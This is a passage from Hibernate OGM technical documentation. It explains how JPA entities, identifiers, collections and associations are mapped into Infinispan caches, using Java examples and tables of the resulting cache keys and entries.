primitive)\n* `java.lang.Long` (or long primitive)\n* 
`java.lang.Float` (or float primitive)\n* `java.lang.Double` (or double primitive)\n\n* `java.math.BigDecimal`\n* `java.math.BigInteger`\n\n* `java.util.Calendar`\n* `java.util.Date`\n* `java.util.UUID`\n* `java.util.URL`\n\n[NOTE]\n====\nHibernate OGM doesn't store null values in Infinispan;\nsetting a value to null is the same as removing the corresponding entry\nfrom Infinispan.\n\nThis can have consequences when it comes to queries on null values.\n====\n\n===== Identifiers\n\nEntity identifiers are used to build the key in which the entity is stored in the cache.\n\nThe key is composed of the following information:\n\n* the identifier column names\n* the identifier column values\n* the entity table (for the `CACHE_PER_KIND` strategy)\n\nIn `CACHE_PER_TABLE`, the table name is inferred from the cache name.\nIn `CACHE_PER_KIND`, the table name is necessary to identify the entity in the generic cache.\n\n.Define an identifier as a primitive type\n====\n[source, JAVA]\n----\n@Entity\npublic class Bookmark {\n\n @Id\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Bookmark` cache in `CACHE_PER_TABLE`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [42] | id | 42 \n | title | \"Hibernate OGM documentation\" \n|===\n\n.Content of the `ENTITIES` cache in `CACHE_PER_KIND`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| \"Bookmark\", [\"id\"], [42] | id | 42 \n | title | \"Hibernate OGM documentation\" \n|===\n====\n\n.Define an identifier using @EmbeddedId\n====\n[source, JAVA]\n----\n@Embeddable\npublic class NewsID implements Serializable {\n\n private String title;\n private String author;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class News {\n\n @EmbeddedId\n private NewsID newsId;\n private String content;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `News` cache in `CACHE_PER_TABLE`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY\n 2+^| MAP ENTRIES\n\n.3+^.^| [newsId.author, newsId.title], [\"Guillaume\", \"How to use Hibernate OGM ?\"]\n | newsId.author | \"Guillaume\"\n\n | newsId.title | \"How to use Hibernate OGM ?\"\n\n | content | \"Simple, just like ORM but with a NoSQL database\"\n|===\n\n.Content of the `ENTITIES` cache in `CACHE_PER_KIND`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY\n 2+^| MAP ENTRIES\n\n.3+^.^| \"News\", [newsId.author, newsId.title], [\"Guillaume\", \"How to use Hibernate OGM ?\"]\n | newsId.author | \"Guillaume\"\n\n | newsId.title | \"How to use Hibernate OGM ?\"\n\n | content | \"Simple, just like ORM but with a NoSQL database\"\n|===\n====\n\n====== Identifier generation strategies\n\nSince Infinispan has no native sequence nor identity column support,\nthese are simulated using the table strategy; however, their default values vary.\nWe highly recommend you explicitly use a `TABLE` strategy if you want to generate a monotonic identifier.\n\nBut if you can, use a pure in-memory and scalable strategy like a UUID generator.\n\n.Id generation strategy TABLE using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE)\n private long id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n\n----\n\n.Content of the `hibernate_sequences` cache in `CACHE_PER_TABLE`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | [\"sequence_name\"], [\"default\"]\n^.^| 
2\n|===\n\n.Content of the `IDENTIFIERS` cache in `CACHE_PER_KIND`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | \"hibernate_sequences\", [\"sequence_name\"], [\"default\"]\n^.^| 2\n|===\n====\n\nAs you can see, in `CACHE_PER_TABLE`, the key does not contain the id source table name.\nIt is inferred from the name of the cache hosting that key.\n\n.Id generation strategy TABLE using a custom table\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE, generator = \"guitarGen\")\n @TableGenerator(\n name = \"guitarGen\",\n table = \"GuitarPlayerSequence\",\n pkColumnName = \"seq\",\n pkColumnValue = \"guitarPlayer\"\n )\n private long id;\n\n \/\/ getters, setters ...\n}\n\n----\n\n.Content of the `GuitarPlayerSequence` cache in `CACHE_PER_TABLE`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | [\"seq\"], [\"guitarPlayer\"]\n^.^| 2\n|===\n\n.Content of the `IDENTIFIERS` cache in `CACHE_PER_KIND`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | \"GuitarPlayerSequence\", [\"seq\"], [\"guitarPlayer\"]\n^.^| 2\n|===\n====\n\n.SEQUENCE id generation strategy\n====\n[source, JAVA]\n----\n@Entity\npublic class Song {\n\n @Id\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"songSequenceGenerator\")\n @SequenceGenerator(\n name = \"songSequenceGenerator\",\n sequenceName = \"song_sequence\",\n initialValue = 2,\n allocationSize = 20\n )\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `hibernate_sequences` cache in `CACHE_PER_TABLE`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | [\"sequence_name\"], [\"song_sequence\"]\n^.^| 11\n|===\n\n.Content of the `IDENTIFIERS` cache in `CACHE_PER_KIND`\n[cols=\"2*\", options=\"header\"]\n|===\n ^| KEY\n ^| NEXT VALUE\n | \"hibernate_sequences\", [\"sequence_name\"], [\"song_sequence\"]\n^.^| 11\n|===\n====\n\n===== Entities\n\nEntities are stored in the cache named after the entity name when using the `CACHE_PER_TABLE` strategy.\nIn the `CACHE_PER_KIND` strategy, entities are stored in a single cache named `ENTITIES`.\n\nThe key is composed of the following information:\n\n* the identifier column names\n* the identifier column values\n* the entity table (for the `CACHE_PER_KIND` strategy)\n\nIn `CACHE_PER_TABLE`, the table name is inferred from the cache name.\nIn `CACHE_PER_KIND`, the table name is necessary to identify the entity in the generic cache.\n\nThe entry value is an instance of `org.infinispan.atomic.FineGrainedMap` \nwhich contains all the entity properties -\nor, to be specific, columns.\nEach column name and value is stored as a key \/ value pair in the map.\nWe use this specialized map as Infinispan is able to transport changes\nin a much more efficient way.\n\n.Default JPA mapping for an entity\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `News` cache in `CACHE_PER_TABLE`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | title | \"On the merits of NoSQL\" \n|===\n\n.Content of the `ENTITIES` cache in `CACHE_PER_KIND`\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| \"News\", [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | title | \"On the merits of NoSQL\" \n|===\n====\n\nAs you can see, the table name is not part of the key for `CACHE_PER_TABLE`.\nIn the rest of this section we will no longer show the `CACHE_PER_KIND` strategy.
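\n\nYou interact with these caches through the standard JPA API only; as an illustration, here is a minimal usage sketch for the entity above (the persistence unit name `ogm-infinispan` is hypothetical, and transaction handling depends on your environment):\n\n.Persisting a `News` entity (sketch)\n====\n[source, JAVA]\n----\n\/\/ imports: javax.persistence.EntityManager, EntityManagerFactory, Persistence\nEntityManagerFactory emf =\n Persistence.createEntityManagerFactory( \"ogm-infinispan\" );\nEntityManager em = emf.createEntityManager();\n\nem.getTransaction().begin();\n\nNews news = new News();\nnews.setId( \"1234-5678\" );\nnews.setTitle( \"On the merits of NoSQL\" );\n\n\/\/ on commit this becomes an entry of the \"News\" cache,\n\/\/ stored under the key [\"id\"], [\"1234-5678\"]\nem.persist( news );\n\nem.getTransaction().commit();\nem.close();\n----\n====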
\n\n.Rename the table and a field using @Table and @Column\n====\n[source, JAVA]\n----\n@Entity\n@Table(name = \"Article\")\npublic class News {\n\n @Id\n private String id;\n\n @Column(name = \"headline\")\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Article` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | headline | \"On the merits of NoSQL\" \n|===\n====\n\n====== Embedded objects and collections\n\n.Embedded object\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n @Embedded\n private NewsPaper paper;\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class NewsPaper {\n\n private String name;\n private String owner;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `News` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.4+^.^| [\"id\"], [\"1234-5678\"] | id | \"1234-5678\"\n | title | \"On the merits of NoSQL\" \n | paper.name | \"NoSQL journal of prophecies\" \n | paper.owner | \"Delphy\" \n|===\n====\n\n.@ElementCollection with one attribute\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `GrandMother` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n ^.^| [\"id\"], [\"granny\"] | id | \"granny\"\n|===\n\n.Content of the `associations_GrandMother_grandChildren` cache in `CACHE_PER_TABLE`\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.4+^.^| [\"GrandMother_id\"], [\"granny\"]\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Leia\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Leia\"\n\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Luke\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Luke\"\n|===\n\n.Content of the `ASSOCIATIONS` cache in `CACHE_PER_KIND`\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.4+^.^| \"GrandMother_grandChildren\", [\"GrandMother_id\"], [\"granny\"]\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Leia\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Leia\"\n\n.2+^.^| [\"GrandMother_id\", \"name\"], [\"granny\", \"Luke\"]\n | GrandMother_id\n | \"granny\"\n\n | name\n | \"Luke\"\n|===\n====\n\nHere, we see that the collection of elements is stored in a separate cache and entry.\nThe association key is made of:\n\n* the foreign key column names pointing to the owner of this association\n* the foreign key column values pointing to the owner of this association\n* the association table name in the `CACHE_PER_KIND` approach where all associations share the same cache\n\nThe association entry is a map containing the representation of each entry in the collection.\nThe keys of that map are made of:\n\n* the names of the columns uniquely identifying that specific collection entry\n (e.g. 
for a `Set` this is all of the columns)\n* the values of the columns uniquely identifying that specific collection entry\n\nThe value attached to that collection entry key is a Map containing the column name \/ column value pairs.\n\n.@ElementCollection with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n @OrderColumn( name = \"birth_order\" )\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `GrandMother` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n ^.^| [\"id\"], [\"granny\"] | id | \"granny\"\n|===\n\n.Content of the `GrandMother_grandChildren` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.6+^.^| [\"GrandMother_id\"], [\"granny\"]\n.3+^.^| [\"GrandMother_id\", \"birth_order\"], [\"granny\", 0]\n | GrandMother_id\n | \"granny\"\n\n | birth_order\n | 0\n\n | name\n | \"Leia\"\n\n.3+^.^| [\"GrandMother_id\", \"birth_order\"], [\"granny\", 1]\n | GrandMother_id\n | \"granny\"\n\n | birth_order\n | 1\n\n | name\n | \"Luke\"\n|===\n====\n\nHere we used an indexed collection; to identify an entry in the collection,\nthe owning entity id and the index value are enough.\n\n.@ElementCollection with Map of @Embeddable\n====\n[source, JAVA]\n----\n@Entity\npublic class ForumUser {\n\n\t@Id\n\tprivate String id;\n\n\t@ElementCollection\n\tprivate Map<String, JiraIssue> issues = new HashMap<>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class JiraIssue {\n\n\tprivate Integer number;\n\tprivate String project;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `ForumUser` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n ^.^| [\"id\"], [\"Jane Doe\"] | id | \"Jane Doe\"\n|===\n\n.Content of the `ForumUser_issues` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| ROW MAP ENTRIES\n\n.12+^.^| [\"ForumUser_id\"], [\"Jane Doe\"]\n\n.4+^.^| [\"ForumUser_id\", \"issues_KEY\"], [\"Jane Doe\", \"issueWithNull\"]\n\n | ForumUser_id\n | \"Jane Doe\"\n\n | issues_KEY\n | \"issueWithNull\"\n\n | issues.value.project\n | <null>\n\n | issues.value.number\n | <null>\n\n.4+^.^| [\"ForumUser_id\", \"issues_KEY\"], [\"Jane Doe\", \"issue1\"]\n\n | ForumUser_id\n | \"Jane Doe\"\n\n | issues_KEY\n | \"issue1\"\n\n | issues.value.project\n | \"OGM\"\n\n | issues.value.number\n | 1253\n\n.4+^.^| [\"ForumUser_id\", \"issues_KEY\"], [\"Jane Doe\", \"issue2\"]\n\n | ForumUser_id\n | \"Jane Doe\"\n\n | issues_KEY\n | \"issue2\"\n\n | issues.value.project\n | \"HSEARCH\"\n\n | issues.value.number\n | 2000\n|===\n====\n\n===== Associations\n\nAssociations between entities are mapped like (collections of) embeddables,\nexcept that the target entity is represented by its identifier(s).\n\n\n.Unidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicule {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n private Vehicule vehicule;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Vehicule` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"V_01\"] | id | \"V_01\"\n | brand | 
\"Mercedes\"\n|===\n\n.Content of the `Wheel` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.3+^.^| [\"id\"], [\"W001\"] | id | \"W001\"\n | diameter | 0.0\n | vehicule_id | \"V_01\"\n|===\n====\n\n[[infinispan-in-entity-one-to-one-join-column]]\n.Unidirectional one-to-one with @JoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicule {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @JoinColumn( name = \"part_of\" )\n private Vehicule vehicule;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Vehicle` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"V_01\"] | id | \"V_01\"\n | brand | \"Mercedes\"\n|===\n\n.Content of the `Wheel` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.3+^.^| \"Wheel\", [\"id\"], [\"W001\"] | id | \"W001\"\n | diameter | 0.0\n | part_of | \"V_01\"\n|===\n====\n\n.Unidirectional one-to-one with @MapsId and @PrimaryKeyJoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicule {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @PrimaryKeyJoinColumn\n @MapsId\n private Vehicule vehicule;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Vehicle` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"V_01\"] | id | \"V_01\"\n | brand | \"Mercedes\"\n|===\n\n.Content of the `Wheel` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"vehicule_id\"], [\"V_01\"] | vehicule_id | \"V_01\"\n | diameter | 0.0\n|===\n====\n\n.Bidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Husband {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne\n private Wife wife;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wife {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne(mappedBy=\"wife\")\n private Husband husband;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Husband` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.3+^.^| [\"id\"], [\"alex\"] | id | \"alex\"\n | name | \"Alex\"\n | wife | \"bea\"\n|===\n\n.Content of the `Wife` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"bea\"] | id | \"bea\"\n | name | \"Bea\"\n|===\n\n.Content of the `associations_Husband` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.2+^.^| [\"wife\"], [\"bea\"]\n.2+^.^| [\"id\", \"wife\"], [\"alex\", \"bea\"]\n | id\n | \"alex\"\n\n | wife\n | \"bea\"\n|===\n====\n\n.Unidirectional one-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Basket` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"davide_basket\"] | id | \"davide_basket\"\n | owner | \"Davide\"\n|===\n\n.Content of the `Product` cache\n[cols=\"3*\", 
options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"name\"], [\"Beer\"] | name | \"Beer\"\n | description | \"Tactical Nuclear Penguin\"\n\n.2+^.^| [\"name\"], [\"Pretzel\"] | name | \"Pretzel\"\n | description | \"Glutino Pretzel Sticks\"\n|===\n\n.Content of the `associations_Basket_Product` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"Basket_id\"], [\"davide_basket\"]\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Beer\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Beer\"\n\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Pretzel\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Pretzel\"\n\n\n|===\n====\n\n.Unidirectional one-to-many with `@JoinTable`\n====\n[source, JAVA]\n----\n@Entity\npublic class Basket {\n\n @Id\n private String id;\n\n private String owner;\n\n @OneToMany\n @JoinTable( name = \"BasketContent\" )\n private List<Product> products = new ArrayList<Product>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Product {\n\n @Id\n private String name;\n\n private String description;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `Basket` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"davide_basket\"] | id | \"davide_basket\"\n | owner | \"Davide\"\n|===\n\n.Content of the `Basket` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"name\"], [\"Beer\"] | name | \"Beer\"\n | description | \"Tactical Nuclear Penguin\"\n\n.2+^.^| [\"name\"], [\"Pretzel\"] | name | \"Pretzel\"\n | description | \"Glutino Pretzel Sticks\"\n|===\n\n.Content of the `associations_BasketContent` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"Basket_id\"], [\"davide_basket\"]\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Beer\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Beer\"\n\n.2+^.^| [\"Basket_id\", \"products_name\"], [\"davide_basket\", \"Pretzel\"]\n | Basket_id\n | \"davide_basket\"\n\n | products_name\n | \"Pretzel\"\n|===\n====\n\n.Unidirectional one-to-many using maps with defaults\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n private Map<String, Address> addresses = new HashMap<String, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `User` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n ^.^| [\"id\"], [\"user_001\"] | id | \"user_001\"\n|===\n\n.Content of the `Address` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"address_001\"] | id | \"address_001\"\n | city | \"Rome\"\n\n.2+^.^| [\"id\"], [\"address_002\"] | id | \"address_002\"\n | city | \"Paris\"\n|===\n\n\n.Content of the `associations_User_address` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.6+^.^| [\"User_id\"], \"user_001\"]\n.3+^.^| [\"User_id\", \"addresses_KEY\"], [\"user_001\", \"home\"]\n | User_id\n | \"user_001\"\n\n | addresses_KEY\n | \"home\"\n\n | addresses_id\n | \"address_001\"\n\n\n.3+^.^| [\"User_id\", \"addresses_KEY\"], [\"user_001\", \"work\"]\n | User_id\n | \"user_002\"\n\n | addresses_KEY\n | \"work\"\n\n | addresses_id\n | 
\"address_002\"\n|===\n====\n\n.Unidirectional one-to-many using maps with @MapKeyColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class User {\n\n @Id\n private String id;\n\n @OneToMany\n @MapKeyColumn(name = \"addressType\")\n private Map<String, Address> addresses = new HashMap<String, Address>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Address {\n\n @Id\n private String id;\n private String city;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `User` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n ^.^| [\"id\"], [\"user_001\"] | id | \"user_001\"\n|===\n\n.Content of the `Address` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"address_001\"] | id | \"address_001\"\n | city | \"Rome\"\n\n.2+^.^| [\"id\"], [\"address_002\"] | id | \"address_002\"\n | city | \"Paris\"\n|===\n\n.Content of the `associations_User_address` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.6+^.^| [\"User_id\"], \"user_001\"]\n.3+^.^| [\"User_id\", \"addressType\"], [\"user_001\", \"home\"]\n | User_id\n | \"user_001\"\n\n | addressesType\n | \"home\"\n\n | addresses_id\n | \"address_001\"\n\n\n.3+^.^| [\"User_id\", \"addressType\"], [\"user_001\", \"work\"]\n | User_id\n | \"user_002\"\n\n | addressesType\n | \"work\"\n\n | addresses_id\n | \"address_002\"\n|===\n====\n\n.Unidirectional many-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class JavaUserGroup {\n\n @Id\n private String jugId;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Member {\n\n @Id\n private String id;\n private String name;\n\n @ManyToOne\n private JavaUserGroup memberOf;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `JavaUserGroup` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"jugId\"], [\"summer_camp\"] | jugId | \"summer_camp\"\n | name | \"JUG Summer Camp\"\n|===\n\n.Content of the `Member` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.3+^.^| [\"member_id\"], [\"emmanuel\"] | member_id | \"emmanuel\"\n | name | \"Emmanuel Bernard\"\n | memberOf_jug_id | \"summer_camp\"\n\n.3+^.^| [\"member_id\"], [\"jerome\"] | member_id | \"jerome\"\n | name | \"Jerome\"\n | memberOf_jug_id | \"summer_camp\"\n|===\n====\n\n.Bidirectional many-to-one \n====\n[source, JAVA]\n----\n@Entity\npublic class SalesForce {\n\n @Id\n private String id;\n private String corporation;\n\n @OneToMany(mappedBy = \"salesForce\")\n private Set<SalesGuy> salesGuys = new HashSet<SalesGuy>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class SalesGuy {\n private String id;\n private String name;\n\n @ManyToOne\n private SalesForce salesForce;\n\n \/\/ getters, setters ...\n}\n----\n\n.Content of the `SalesForce` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [\"red_hat\"] | id | \"red_hat\"\n | corporation | \"Red Hat\"\n|===\n\n.Content of the `SalesGuy` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.3+^.^| [\"id\"], [\"eric\"] | id | \"eric\"\n | name | \"Eric\"\n | salesForce_id | \"red_hat\"\n\n.3+^.^| [\"id\"], [\"simon\"] | id | \"simon\"\n | name | \"Simon\"\n | salesForce_id | \"red_hat\"\n|===\n\n.Content of the `associations_SalesGuy` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"salesForce_id\"], [\"red_hat\"]\n.2+^.^| [\"salesForce_id\", \"id\"], 
[\"red_hat\", \"eric\"]\n | salesForce_id\n | \"red_hat\"\n\n | id\n | \"eric\"\n\n.2+^.^| [\"salesForce_id\", \"id\"], [\"red_hat\", \"simon\"]\n | salesForce_id\n | \"red_hat\"\n\n | id\n | \"simon\"\n|===\n====\n\n.Unidirectional many-to-many\n====\n[source, JAVA]\n----\n@Entity\npublic class Student {\n\n @Id\n private String id;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class ClassRoom {\n\n @Id\n private long id;\n private String lesson;\n\n @ManyToMany\n private List<Student> students = new ArrayList<Student>();\n\n \/\/ getters, setters ...\n}\n----\n\nThe \"Math\" class has 2 students: John Doe and Mario Rossi\n\nThe \"English\" class has 2 students: Kate Doe and Mario Rossi\n\n.Content of the `ClassRoom` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n\n.2+^.^| [\"id\"], [1] | id | 1 \n | name | \"Math\"\n\n.2+^.^| [\"id\"], [2] | id | 2 \n | name | \"English\"\n|===\n\n.Content of the `Student` cache\n[cols=\"3*\", options=\"header\"]\n|===\n ^| KEY 2+^| MAP ENTRIES\n.2+^.^| [\"id\"], [\"john\"] | id | \"john\"\n | name | \"John Doe\"\n\n.2+^.^| [\"id\"], [\"mario\"] | id | \"mario\"\n | name | \"Mario Rossi\"\n\n.2+^.^| [\"id\"], [\"kate\"] | id | \"kate\"\n | name | \"Kate Doe\"\n|===\n\n.Content of the `associations_ClassRoom_Student` cache\n[cols=\"4*\", options=\"header\"]\n|===\n ^| KEY\n ^| ROW KEY\n 2+^| MAP ENTRIES\n\n.4+^.^| [\"ClassRoom_id\"], [1]\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [1, \"mario\"]\n | ClassRoom_id\n | 1 \n\n | students_id\n | \"mario\"\n\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [1, \"john\"]\n | ClassRoom_id\n | 1 \n\n | students_id\n | \"john\"\n\n.4+^.^| [\"ClassRoom_id\"], [2]\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [2, \"kate\"]\n | ClassRoom_id\n | 2 \n\n | students_id\n | \"kate\"\n\n.2+^.^| [\"ClassRoom_id\", \"students_id\"], [2, \"mario\"]\n | ClassRoom_id\n | 2 \n\n | students_id\n | \"mario\"\n|===\n====\n\n.Bidirectional many-to-many \n====\n[source, JAVA]\n----\n@Entity\npublic class AccountOwner {\n\n @Id\n private String id;\n\n private String SSN;\n\n @ManyToMany\n private Set<BankAccount> bankAccounts;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class BankAccount {\n\n @Id\n private String id;\n\n private String accountNumber;\n\n @ManyToMany( mappedBy = 